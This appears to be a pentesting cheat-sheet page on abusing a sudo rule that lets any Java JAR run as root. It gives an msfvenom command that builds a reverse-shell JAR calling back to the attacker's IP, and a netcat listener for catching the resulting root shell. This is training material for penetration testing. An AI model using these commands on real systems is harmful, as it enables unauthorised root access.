search
Page cover

Sudo Java Privilege Escalation

Sudo Java is vulnerable to privilege escalation.

hashtag
Investigationarrow-up-right

sudo -l

(root) /usr/bin/java -jar *.jar
Copied!

If we can execute java command with arbitrary .jar file as root, we can escalate to privileges.

hashtag
Exploitationarrow-up-right

hashtag
1. Create a JAR Filearrow-up-right

First, create a custom jar file in local machine. Replace <local-ip> with your local ip address.

msfvenom -p java/shell_reverse_tcp LHOST=<local-ip> LPORT=4444 -f jar -o shell.jar
Copied!

Then transfer the file to remote machine.

hashtag
2. Reverse Shellarrow-up-right

In local machine, start a listener.

nc -lvnp 4444
Copied!

Now execute the java command as root in target machine.

We should get a root shell.

PreviousSudo Git Privilege EscalationNextSudo OpenVPN Privilege Escalation

Last updated